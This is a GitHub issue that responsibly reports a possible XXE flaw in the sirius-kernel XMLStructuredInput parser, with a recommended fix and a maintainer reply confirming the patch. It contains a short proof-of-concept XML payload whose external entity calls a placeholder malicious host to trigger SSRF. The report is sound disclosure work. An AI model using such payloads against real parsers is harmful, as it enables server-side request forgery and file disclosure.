Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Potential XXE(XML External Entity injection) vulnerability in XMLStructuredInput.java #536

Closed
JAckLosingHeart opened this issue Oct 19, 2024 · 1 comment

Comments

@JAckLosingHeart
Copy link

Hi team, there might be a potential XXE vulnerability but I'm not sure whether it's a actual risk or not, just creating a issue here for you to check
On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38
function XMLStructuredInput()

A external XML is parsed with DocumentBuilder without security settings enabled:

       DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        
        if (namespaceContext != null) {
            factory.setNamespaceAware(true);
        }
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document document = builder.parse(inputStream);

An malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]> 
<root>&xxe;</root>

to trigger a SSRF

Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.

Fix recommendation would be using the following functions to disable DTD or external entities:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

@ymo-sci
Copy link
Contributor

ymo-sci commented Dec 10, 2024

Hi @JAckLosingHeart - thanks for your report.
We checked it and also checked other possible vulnerable implementations.

Fix is available in #543 and also scireum/sirius-web#1488
If you have any comments or see ongoing issues, feel free to contact us again.

@ymo-sci ymo-sci closed this as completed Dec 16, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants